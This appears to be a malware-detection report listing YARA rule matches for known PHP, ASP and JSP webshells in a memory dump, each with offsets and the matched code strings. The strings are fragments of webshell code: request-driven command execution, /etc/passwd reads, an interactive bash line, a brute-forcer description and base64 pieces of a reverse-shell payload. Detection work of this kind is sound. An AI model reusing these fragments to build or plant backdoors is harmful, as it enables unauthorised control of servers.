- 0x1c51b:$s14: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x24943:$s14: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x42548:$s14: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x4aa86:$s14: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x4c48e:$s14: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x42594:$s16: Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
- 0x1c490:$s19: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x20c09:$s19: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x248fd:$s19: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x425d1:$s19: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x4c448:$s19: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_NCC_Shell | PHP Webshells Github Archive - file NCC-Shell.php | Florian Roth | - 0x426e2:$s0: if (isset($_FILES['probe']) and ! $_FILES['probe']['error']) {
- 0x42726:$s1: <b>--Coded by Silver
- 0x4273f:$s2: <title>Upload - Shell/Datei</title>
- 0x42767:$s8: <a href="http://www.n-c-c.6x.to" target="_blank">-->NCC<--</a></center></b><
- 0x427b9:$s14: ~|_Team .:National Cracker Crew:._|~<br>
- 0x427e7:$s18: printf("Sie ist %u Bytes gro
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_README | PHP Webshells Github Archive - file README.md | Florian Roth | - 0x428da:$s0: Common php webshells. Do not host the file(s) in your server!
- 0x4291c:$s1: php-webshells
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_backupsql | PHP Webshells Github Archive - file backupsql.php | Florian Roth | - 0x429f9:$s0: $headers .= "\nMIME-Version: 1.0\n" ."Content-Type: multipart/mixed;\n" .
- 0x327f6:$s1: $ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog
- 0x42a47:$s1: $ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog
- 0x42a9b:$s2: * as email attachment, or send to a remote ftp server by
- 0x42ad9:$s16: * Neagu Mihai<neagumihai@hotmail.com>
- 0x42b04:$s17: $from = "Neu-Cool@email.com"; // Who should the emails be sent from?, may
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_AK_74_Security_Team_Web_Shell_Beta_Version | PHP Webshells Github Archive - file AK-74 Security Team Web Shell Beta Version.php | Florian Roth | - 0x42c64:$s8: - AK-74 Security Team Web Site: www.ak74-team.net
- 0x42c9a:$s9: <b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>'.
- 0x42cf0:$s10: <b><font color=#83000>Execute system commands!</font></b>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_cpanel | PHP Webshells Github Archive - file cpanel.php | Florian Roth | - 0x42e01:$s0: function ftp_check($host,$user,$pass,$timeout){
- 0x42e35:$s3: curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
- 0x42e6d:$s4: [ user@alturks.com ]# info<b><br><font face=tahoma><br>
- 0x42eaa:$s12: curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
- 0x42ed9:$s13: Powerful tool , ftp and cPanel brute forcer , php 5.2.9 safe_mode & open_basedir
- 0x42f2f:$s20: <br><b>Please enter your USERNAME and PASSWORD to logon<br>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_accept_language | PHP Webshells Github Archive - file accept_language.php | Florian Roth | - 0x43046:$s0: <?php passthru(getenv("HTTP_ACCEPT_LANGUAGE")); echo '<br> by q1w2e3r4'; ?>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_529 | PHP Webshells Github Archive - file 529.php | Florian Roth | - 0x43163:$s0: <p>More: <a href="/">Md5Cracking.Com Crew</a>
- 0x43196:$s7: href="/" title="Securityhouse">Security House - Shell Center - Edited By Kin
- 0x431e7:$s9: echo '<PRE><P>This is exploit from <a
- 0x43213:$s10: This Exploit Was Edited By KingDefacer
- 0x4323f:$s13: safe_mode and open_basedir Bypass PHP 5.2.9
- 0x43271:$s14: $hardstyle = explode("/", $file);
- 0x43299:$s20: while($level--) chdir("..");
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_STNC_WebShell_v0_8 | PHP Webshells Github Archive - file STNC WebShell v0.8.php | Florian Roth | - 0x43398:$s3: if(isset($_POST["action"])) $action = $_POST["action"];
- 0x433d4:$s8: elseif(fe("system")){ob_start();system($s);$r=ob_get_contents();ob_end_clean()
- 0x43428:$s13: { $pwd = $_POST["pwd"]; $type = filetype($pwd); if($type === "dir")chdir($pw
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_tryag | PHP Webshells Github Archive - file tryag.php | Florian Roth | - 0x4354a:$s1: <title>TrYaG Team - TrYaG.php - Edited By KingDefacer</title>
- 0x4358c:$s3: $tabledump = "DROP TABLE IF EXISTS $table;\n";
- 0x435c0:$s6: $string = !empty($_POST['string']) ? $_POST['string'] : 0;
- 0x43600:$s7: $tabledump .= "CREATE TABLE $table (\n";
- 0x4362f:$s14: echo "<center><div id=logostrip>Edit file: $editfile </div><form action='$REQUE
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_dC3_Security_Crew_Shell_PRiV_2 | PHP Webshells Github Archive - file dC3 Security Crew Shell PRiV.php | Florian Roth | - 0x3dc6e:$s0: @rmdir($_GET['file']) or die ("[-]Error deleting dir!");
- 0x43776:$s0: @rmdir($_GET['file']) or die ("[-]Error deleting dir!");
- 0x437b3:$s9: header("Last-Modified: ".date("r",filemtime(__FILE__)));
- 0x437f1:$s13: header("Content-type: image/gif");
- 0x43819:$s14: @copy($file,$to) or die ("[-]Error copying file!");
- 0x3dd8a:$s20: if (isset($_GET['rename_all'])) {
- 0x43852:$s20: if (isset($_GET['rename_all'])) {
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_qsd_php_backdoor | PHP Webshells Github Archive - file qsd-php-backdoor.php | Florian Roth | - 0x43951:$s1: // A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.c
- 0x439a6:$s2: if(isset($_POST["newcontent"]))
- 0x439ca:$s3: foreach($parts as $val)//Assemble the path back together
- 0x43a07:$s7: $_POST["newcontent"]=urldecode(base64_decode($_POST["newcontent"]));
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_spygrup | PHP Webshells Github Archive - file spygrup.php | Florian Roth | - 0x43b25:$s2: kingdefacer@msn.com</FONT></CENTER></B>");
- 0x43b54:$s6: if($_POST['root']) $root = $_POST['root'];
- 0x43b84:$s12: ".htmlspecialchars($file)." Bu Dosya zaten Goruntuleniyor<kingdefacer@msn.com>
- 0x43bd8:$s18: By KingDefacer From Spygrup.org>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Web_shell__c_ShAnKaR | PHP Webshells Github Archive - file Web-shell (c)ShAnKaR.php | Florian Roth | - 0x43cde:$s0: header("Content-Length: ".filesize($_POST['downf']));
- 0x43d18:$s5: if($_POST['save']==0){echo "<textarea cols=70 rows=10>".htmlspecialchars($dump
- 0x43d6b:$s6: write("#\n#Server : ".getenv('SERVER_NAME')."
- 0x43d9e:$s12: foreach(@file($_POST['passwd']) as $fed)echo $fed;
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Ayyildiz_Tim___AYT__Shell_v_2_1_Biz | PHP Webshells Github Archive - file Ayyildiz Tim -AYT- Shell v 2.1 Biz.php | Florian Roth | - 0x43ed4:$s7: <meta name="Copyright" content=TouCh By iJOo">
- 0x40734:$s11: directory... Trust me - it works :-) */
- 0x43f08:$s11: directory... Trust me - it works :-) */
- 0x43f35:$s15: /* ls looks much better with ' -F', IMHO. */
- 0x43f67:$s16: } else if ($command == 'ls') {
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Gamma_Web_Shell | PHP Webshells Github Archive - file Gamma Web Shell.php | Florian Roth | - 0x44061:$s4: $ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];
- 0x44096:$s8: ### Gamma Group <http://www.gammacenter.com>
- 0x440c8:$s15: my $error = "This command is not available in the restricted mode.\n";
- 0x44114:$s20: my $command = $self->query('command');
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_aspydrv | PHP Webshells Github Archive - file aspydrv.php | Florian Roth | - 0x44214:$s0: Target = "D:\hshome\masterhr\masterhr.com\" ' ---Directory to which files
- 0x44263:$s1: nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
- 0x442a4:$s3: Document.frmSQL.mPage.value = Document.frmSQL.mPage.value - 1
- 0x442e7:$s17: If request.querystring("getDRVs")="@" then
- 0x44317:$s20: ' ---Copy Too Folder routine Start
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_JspWebshell_1_2_2 | PHP Webshells Github Archive - file JspWebshell 1.2.php | Florian Roth | - 0x40f27:$s0: System.out.println("CreateAndDeleteFolder is error:"+ex);
- 0x44417:$s0: System.out.println("CreateAndDeleteFolder is error:"+ex);
- 0x40f9c:$s3: <%@ page contentType="text/html; charset=GBK" language="java" import="java.
- 0x44456:$s3: <%@ page contentType="text/html; charset=GBK" language="java" import="java.
- 0x444a6:$s4: // String tempfilepath=request.getParameter("filepath");
- 0x444e4:$s15: endPoint=random1.getFilePointer();
- 0x4450c:$s20: if (request.getParameter("command") != null) {
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_g00nshell_v1_3 | PHP Webshells Github Archive - file g00nshell-v1.3.php | Florian Roth | - 0x44615:$s10: #To execute commands, simply include ?cmd=___ in the url. #
- 0x44656:$s15: $query = "SHOW COLUMNS FROM " . $_GET['table'];
- 0x4468b:$s16: $uakey = "724ea055b975621b9d679f7077257bd9"; // MD5 encoded user-agent
- 0x446d7:$s17: echo("<form method='GET' name='shell'>");
- 0x44706:$s18: echo("<form method='post' action='?act=sql'>");
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_WinX_Shell | PHP Webshells Github Archive - file WinX Shell.php | Florian Roth | - 0x44807:$s4: // It's simple shell for all Win OS.
- 0x44830:$s5: //------- [netstat -an] and [ipconfig] and [tasklist] ------------
- 0x44877:$s6: <html><head><title>-:[GreenwooD]:- WinX Shell</title></head>
- 0x448b9:$s13: // Created by greenwood from n57
- 0x448df:$s20: if (is_uploaded_file($userfile)) {
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_PHANTASMA | PHP Webshells Github Archive - file PHANTASMA.php | Florian Roth | - 0x449d3:$s12: " printf(\"Usage: %s [Host] <port>\\n\", argv[0]);\n" .
- 0x44a13:$s15: if ($portscan != "") {
- 0x44a2f:$s16: echo "<br>Banner: $get <br><br>";
- 0x44a56:$s20: $dono = get_current_user( );
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_cw | PHP Webshells Github Archive - file cw.php | Florian Roth | - 0x44b42:$s1: // Dump Database [pacucci.com]
- 0x44b65:$s2: $dump = "-- Database: ".$_POST['db'] ." \n";
- 0x44b96:$s7: $aids = passthru("perl cbs.pl ".$_POST['connhost']." ".$_POST['connport']);
- 0x44be6:$s8: <b>IP:</b> <u>" . $_SERVER['REMOTE_ADDR'] ."</u> - Server IP:</b> <a href='htt
- 0x44c3a:$s14: $dump .= "-- Cyber-Warrior.Org\n";
- 0x44c62:$s20: if(isset($_POST['doedit']) && $_POST['editfile'] != $dir)
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_include_w_shell | PHP Webshells Github Archive - file php-include-w-shell.php | Florian Roth | - 0x44d80:$s13: # dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!!
- 0x44dc5:$s17: "phpshellapp" => "export TERM=xterm; bash -i",
- 0x44df9:$s19: else if($numhosts == 1) $strOutput .= "On 1 host..\n";
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_mysql_tool | PHP Webshells Github Archive - file mysql_tool.php | Florian Roth | - 0x44f02:$s12: $dump .= "-- Dumping data for table '$table'\n";
- 0x44f38:$s20: $dump .= "CREATE TABLE $table (\n";
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_PhpSpy_Ver_2006 | PHP Webshells Github Archive - file PhpSpy Ver 2006.php | Florian Roth | - 0x45037:$s2: var_dump(@$shell->RegRead($_POST['readregname']));
- 0x29112:$s12: $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname.
- 0x4506f:$s12: $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname.
- 0x450c2:$s19: $program = isset($_POST['program']) ? $_POST['program'] : "c:\winnt\system32
- 0x45114:$s20: $regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\winnt\backdoor.exe'
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_ZyklonShell | PHP Webshells Github Archive - file ZyklonShell.php | Florian Roth | - 0x45236:$s0: The requested URL /Nemo/shell/zyklonshell.txt was not found on this server.<P>
- 0x45289:$s1: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- 0x452c0:$s2: <TITLE>404 Not Found</TITLE>
- 0x452e1:$s3: <H1>Not Found</H1>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_myshell | PHP Webshells Github Archive - file myshell.php | Florian Roth | - 0x453cd:$s0: if($ok==false &&$status && $autoErrorTrap)system($command . " 1> /tmp/outpu
- 0x3f3be:$s5: system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o
- 0x4541d:$s5: system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o
- 0x4546e:$s15: <title>$MyShellVersion - Access Denied</title>
- 0x454a2:$s16: }$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTT
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_lolipop | PHP Webshells Github Archive - file lolipop.php | Florian Roth | - 0x455c8:$s3: $commander = $_POST['commander'];
- 0x455ef:$s9: $sourcego = $_POST['sourcego'];
- 0x45615:$s20: $result = mysql_query($loli12) or die (mysql_error());
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_simple_cmd | PHP Webshells Github Archive - file simple_cmd.php | Florian Roth | - 0x3906f:$s1: <input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"
- 0x4571e:$s1: <input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"
- 0x39048:$s2: <title>G-Security Webshell</title>
- 0x4575a:$s2: <title>G-Security Webshell</title>
- 0x390ab:$s4: <? if($cmd != "") print Shell_Exec($cmd);?>
- 0x45781:$s4: <? if($cmd != "") print Shell_Exec($cmd);?>
- 0x390db:$s6: <? $cmd = $_REQUEST["-cmd"];?>
- 0x457b1:$s6: <? $cmd = $_REQUEST["-cmd"];?>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_go_shell | PHP Webshells Github Archive - file go-shell.php | Florian Roth | - 0x4589d:$s0: #change this password; for power security - delete this file =)
- 0x458e1:$s2: if (!defined$param{cmd}){$param{cmd}="ls -la"};
- 0x45916:$s11: open(FILEHANDLE, "cd $param{dir}&&$param{cmd}|");
- 0x4594d:$s12: print << "[kalabanga]";
- 0x4596a:$s13: <title>GO.cgi</title>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_aZRaiLPhp_v1_0 | PHP Webshells Github Archive - file aZRaiLPhp v1.0.php | Florian Roth | - 0x45a59:$s0: <font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$RED
- 0x45aa8:$s4: $fileperm=base_convert($_POST['fileperm'],8,10);
- 0x45ade:$s19: touch ("$path/$dismi") or die("Dosya Olu
- 0x45b0c:$s20: echo "<div align=left><a href='./$this_file?dir=$path/$file'>G
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_webshells_zehir4 | Webshells Github Archive - file zehir4 | Florian Roth | - 0x45c1c:$s0: frames.byZehir.document.execCommand(command, false, option);
- 0x45c5d:$s8: response.Write "<title>ZehirIV --> Powered By Zehir <zehirhacker@hotmail.com
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_zehir4_asp_php | PHP Webshells Github Archive - file zehir4.asp.php.txt | Florian Roth | - 0x45d86:$s4: response.Write "<title>zehir3 --> powered by zehir <zehirhacker@hotmail.com&
- 0x45c1c:$s11: frames.byZehir.document.execCommand(
- 0x45ddb:$s11: frames.byZehir.document.execCommand(
- 0x45e05:$s11: frames.byZehir.document.execCommand(
- 0x45c1c:$s15: frames.byZehir.document.execCommand(co
- 0x45e05:$s15: frames.byZehir.document.execCommand(co
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_lostDC | PHP Webshells Github Archive - file lostDC.php | Florian Roth | - 0x45f03:$s0: $info .= '[~]Server: ' .$_SERVER['HTTP_HOST'] .'<br />';
- 0x45f40:$s4: header ( "Content-Description: Download manager" );
- 0x45f78:$s5: print "<center>[ Generation time: ".round(getTime()-startTime,4)." second
- 0x45fc6:$s9: if (mkdir($_POST['dir'], 0777) == false) {
- 0x45ff6:$s12: $ret = shellexec($command);
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_CasuS_1_5 | PHP Webshells Github Archive - file CasuS 1.5.php | Florian Roth | - 0x460e1:$s2: <font size='+1'color='#0000FF'><u>CasuS 1.5'in URL'si</u>: http://$HTTP_HO
- 0x46130:$s8: $fonk_kap = get_cfg_var("fonksiyonlary_kapat");
- 0x46165:$s18: if (file_exists("F:\\")){
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_ftpsearch | PHP Webshells Github Archive - file ftpsearch.php | Florian Roth | - 0x4624e:$s0: echo "[-] Error : coudn't read /etc/passwd";
- 0x4627f:$s9: @$ftp=ftp_connect('127.0.0.1');
- 0x462a4:$s12: echo "<title>Edited By KingDefacer</title><body>";
- 0x462dc:$s19: echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell__Cyber_Shell_cybershell_Cyber_Shell__v_1_0_ | PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php | Florian Roth | - 0x464a7:$s4: <a href="http://www.cyberlords.net" target="_blank">Cyber Lords Community</
- 0x464f9:$s10: echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?edit=$nameoffile&sh
- 0x4654c:$s11: * Coded by Pixcher
- 0x46567:$s16: <input type=text size=55 name=newfile value="$d/newfile.php">
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell__Ajax_PHP_Command_Shell_Ajax_PHP_Command_Shell_soldierofallah | PHP Webshells Github Archive - from files Ajax_PHP Command Shell.php, Ajax_PHP_Command_Shell.php, soldierofallah.php | Florian Roth | - 0x46755:$s1: 'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')",
- 0x46794:$s2: 'Running processes' => "runcommand('ps -aux','GET')",
- 0x467ce:$s3: $dt = $_POST['filecontent'];
- 0x467ef:$s4: 'Open ports' => "runcommand('netstat -an | grep -i listen','GET')",
- 0x46837:$s6: print "Sorry, none of the command functions works.";
- 0x46871:$s11: document.cmdform.command.value='';
- 0x46899:$s12: elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Generic_PHP_7 | PHP Webshells Github Archive - from files Mysql interface v1.0.php, MySQL Web Interface Version 0.8.php, Mysql_interface_v1.0.php, MySQL_Web_Interface_Version_0.8.php | Florian Roth | - 0x46a41:$s0: header("Content-disposition: filename=$filename.sql");
- 0x46a7c:$s1: else if( $action == "dumpTable" || $action == "dumpDB" ) {
- 0x46abb:$s2: echo "<font color=blue>[$USERNAME]</font> - \n";
- 0x46af0:$s4: if( $action == "dumpTable" )
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell__Small_Web_Shell_by_ZaCo_small_zaco_zacosmall | PHP Webshells Github Archive - from files Small Web Shell by ZaCo.php, small.php, zaco.php, zacosmall.php | Florian Roth | - 0x46cd1:$s2: if(!$result2)$dump_file.='#error table '.$rows[0];
- 0x46d08:$s4: if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
- 0x46d4b:$s6: header('Content-Length: '.strlen($dump_file)."\n");
- 0x46d84:$s20: echo('Dump for '.$db_dump.' now in '.$to_file);
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Generic_PHP_8 | PHP Webshells Github Archive - from files Macker\'s Private PHPShell.php, PHP Shell.php, Safe0ver Shell -Safe Mod Bypass By Evilc0der.php | Florian Roth | - 0x46edc:$s1: elseif ( $cmd=="file" ) { /* View a file in text --> */
- 0x41258:$s2: elseif ( $cmd=="upload" ) { /* Upload File form --> */
- 0x46f1d:$s2: elseif ( $cmd=="upload" ) { /* Upload File form --> */
- 0x46f5e:$s3: /* I added this to ensure the script will run correctly...
- 0x46f9e:$s14: </form> -->
- 0x2284d:$s15: <form action=\"$SFileName?$urlAdd\" method=\"POST\">
- 0x36819:$s15: <form action=\"$SFileName?$urlAdd\" method=\"POST\">
- 0x46fb9:$s15: <form action=\"$SFileName?$urlAdd\" method=\"POST\">
- 0x46ff3:$s20: elseif ( $cmd=="downl" ) { /* Save the edited file back to a file --> */
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell__PH_Vayv_PHVayv_PH_Vayv_klasvayv_asp_php | PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php, klasvayv.asp.php.txt | Florian Roth | - 0x471fa:$s1: <font color="#000000">Sil</font></a></font></td>
- 0x4722f:$s5: <td width="122" height="17" bgcolor="#9F9F9F">
- 0x47262:$s6: onfocus="if (this.value == 'Kullan
- 0x4728a:$s16: <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif">
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Generic_PHP_9 | PHP Webshells Github Archive - from files KAdot Universal Shell v0.1.6.php, KAdot_Universal_Shell_v0.1.6.php, KA_uShell 0.1.6.php | Florian Roth | - 0x47460:$s2: :<b>" .base64_decode($_POST['tot']). "</b>";
- 0x47491:$s6: if (isset($_POST['wq']) && $_POST['wq']<>"") {
- 0x474c5:$s12: if (!empty($_POST['c'])){
- 0x474e4:$s13: passthru($_POST['c']);
- 0x47500:$s16: <input type="radio" name="tac" value="1">B64 Decode<br>
- 0x4753d:$s20: <input type="radio" name="tac" value="3">md5 Hash
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell__PH_Vayv_PHVayv_PH_Vayv | PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php | Florian Roth | - 0x476d3:$s4: <form method="POST" action="<?echo "PHVayv.php?duzkaydet=$dizin/$duzenle
- 0x47721:$s12: <? if ($ekinci=="." or $ekinci=="..") {
- 0x4774f:$s17: name="duzenx2" value="Klas
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Generic_PHP_1 | PHP Webshells Github Archive - from files Dive Shell 1.0 - Emperor Hacking Team.php, Dive_Shell_1.0_Emperor_Hacking_Team.php, SimShell 1.0 - Simorgh Security MGZ.php, SimShell_1.0_-_Simorgh_Security_MGZ.php | Florian Roth | - 0x478dd:$s1: $token = substr($_REQUEST['command'], 0, $length);
- 0x47914:$s4: var command_hist = new Array(<?php echo $js_command_hist ?>);
- 0x47956:$s7: $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
- 0x47991:$s9: document.shell.command.value = command_hist[current_line];
- 0x479d1:$s16: $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $
- 0x47a1f:$s19: if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
- 0x47a61:$s20: if (e.keyCode == 38 && current_line < command_hist.length-1) {
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Generic_PHP_2 | PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, Loaderz WEB Shell.php, stres.php | Florian Roth | - 0x47c4b:$s3: if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
- 0x47c8a:$s4: \$port = {$_POST['port']};
- 0x47ca9:$s5: $_POST['installpath'] = "temp.pl";}
- 0x47cd2:$s14: if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["u
- 0x47d25:$s16: copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell__CrystalShell_v_1_erne_stres | PHP Webshells Github Archive - from files CrystalShell v.1.php, erne.php, stres.php | Florian Roth | - 0x47ede:$s1: <input type='submit' value=' open (shill.txt) '>
- 0x47f14:$s4: var_dump(curl_exec($ch));
- 0x47f32:$s7: if(empty($_POST['Mohajer22'])){
- 0x47f57:$s10: $m=$_POST['curl'];
- 0x47f6f:$s13: $u1p=$_POST['copy'];
- 0x47f89:$s14: if(empty(\$_POST['cmd'])){
- 0x47fa9:$s15: $string = explode("|",$string);
- 0x47fce:$s16: $stream = imap_open("/etc/passwd", "", "");
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Generic_PHP_3 | PHP Webshells Github Archive - from files Antichat Shell v1.3.php, Antichat Shell. Modified by Go0o$E.php, Antichat Shell.php, fatal.php | Florian Roth | - 0x48151:$s0: header('Content-Length:'.filesize($file).'');
- 0x48183:$s4: <textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['comma
- 0x481cb:$s7: if(filetype($dir . $file)=="file")$files[]=$file;
- 0x48202:$s14: elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}
- 0x4823c:$s20: $info .= (($perms & 0x0004) ? 'r' : '-');
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Generic_PHP_4 | PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, nshell.php, Loaderz WEB Shell.php, stres.php | Florian Roth | - 0x3c78c:$s0: if ($filename != "." and $filename != ".."){
- 0x4844c:$s0: if ($filename != "." and $filename != ".."){
- 0x4847d:$s2: $owner["write"] = ($mode & 00200) ? 'w' : '-';
- 0x48c5e:$s2: $owner["write"] = ($mode & 00200) ? 'w' : '-';
- 0x484b0:$s5: $owner["execute"] = ($mode & 00100) ? 'x' : '-';
- 0x484e5:$s6: $world["write"] = ($mode & 00002) ? 'w' : '-';
- 0x48518:$s7: $world["execute"] = ($mode & 00001) ? 'x' : '-';
- 0x48c93:$s7: $world["execute"] = ($mode & 00001) ? 'x' : '-';
- 0x4854e:$s10: foreach ($arr as $filename) {
- 0x48571:$s19: else if( $mode & 0x6000 ) { $type='b'; }
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_GFS | PHP Webshells Github Archive - from files GFS web-shell ver 3.1.7 - PRiV8.php, Predator.php, GFS_web-shell_ver_3.1.7_-_PRiV8.php | Florian Roth | - 0x4871c:$s0: OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
- 0x48754:$s1: lIENPTk47DQpleGl0IDA7DQp9DQp9";
- 0x48778:$s2: Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShm
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell__CrystalShell_v_1_sosyete_stres | PHP Webshells Github Archive - from files CrystalShell v.1.php, sosyete.php, stres.php | Florian Roth | - 0x4893d:$s1: A:visited { COLOR:blue; TEXT-DECORATION: none}
- 0x48970:$s4: A:active {COLOR:blue; TEXT-DECORATION: none}
- 0x489a2:$s11: scrollbar-darkshadow-color: #101842;
- 0x489cc:$s15: <a bookmark="minipanel">
- 0x489ea:$s16: background-color: #EBEAEA;
- 0x48a0a:$s18: color: #D5ECF9;
- 0x48a1f:$s19: <center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 border
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Generic_PHP_10 | PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php, PHPRemoteView.php | Florian Roth | - 0x48c1f:$s2: $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
- 0x48c5e:$s6: $owner["write"] = ($mode & 00200) ? 'w' : '-';
- 0x48c93:$s11: $world["execute"] = ($mode & 00001) ? 'x' : '-';
- 0x48cca:$s12: else if( $mode & 0xA000 )
- 0x48cea:$s17: $s=sprintf("%1s", $type);
- 0x48d0a:$s20: font-size: 8pt;
- 0x49f4e:$s20: font-size: 8pt;
|
